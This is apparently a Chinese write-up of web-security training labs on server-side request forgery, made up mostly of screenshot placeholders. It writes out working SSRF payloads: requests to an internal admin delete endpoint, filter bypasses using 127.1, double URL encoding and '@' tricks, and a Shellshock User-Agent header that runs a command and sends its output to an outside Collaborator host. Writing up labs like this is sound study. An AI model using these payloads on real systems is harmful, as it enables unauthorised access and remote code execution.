针对本地服务器的基本 SSRF

image-20221207181137526

可以看到发送了一个url过去 说明后端可能存在url请求解析

image-20221207181128651

说明存在ssrf 并且可以看到存在一个 admin panel页面

image-20221207181630418

image-20221207181751663

stockApi=http%3a//127.0.0.1/admin/delete?username=carlos

image-20221207181813763

image-20221207181835081

针对另一个后端系统的基本 SSRF

image-20221207181859563

image-20221207182432314

image-20221207182438129

image-20221207182613911

可以发现这个199与其他的不一样 而且是not found 说明可能url不正确

image-20221207182705753

image-20221207182726077

SSRF 与基于黑名单的输入过滤器

image-20221207182752623

image-20221207190336497

可以看到存在过滤 简单绕过一下

stockApi=http://127.1/

image-20221207190609629

image-20221207190619963

还是存在过滤 我们这里使用二次url编码admin字符

image-20221207190656371

stockApi=http://127.1/%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65/delete?username=carlos

image-20221207190717977

SSRF 通过开放重定向漏洞绕过过滤器

image-20221207193202040

image-20221207193349685

这次无法绕过 但是我们发现在next product 存在一个开放重定向漏洞

image-20221207193150832

image-20221207193314932

image-20221207193705093

image-20221207193758219

image-20221207193841222

带外检测的盲 SSRF

image-20221207194131956

替换referer

image-20221207194440953

image-20221207194450944

具有基于白名单的输入过滤器的 SSRF

image-20221207195505319

可以看到白名单

image-20221207195452596

stockApi=http://127.0.0.1%25%32%33@stock.weliketoshop.net/

尝试 构造 #@格式 @之前的字符作为账号 @之后的url

image-20221207200556792

image-20221207200815576

利用 Shellshock 的盲 SSRF

image-20221207233658231

image-20221207233640096

image-20221207234922051

目的是将当前网站添加到扫描列表中去

image-20221207235355149

这里扫描到了问题

现在我们需要去查看 Shellshock 发现是个bash漏洞

image-20221207234153233

User-Agent: () { :; }; /usr/bin/nslookup $(whoami).lsh5z06ulics0wpry9wjv8w4mvslga.burpcollaborator.net

Referer: http://192.168.0.1:8080/

这里还需要去获取一下 那个ip是正确的

image-20221207235733079

image-20221207235818861

image-20221207235919617

成功收到请求

image-20221207235948514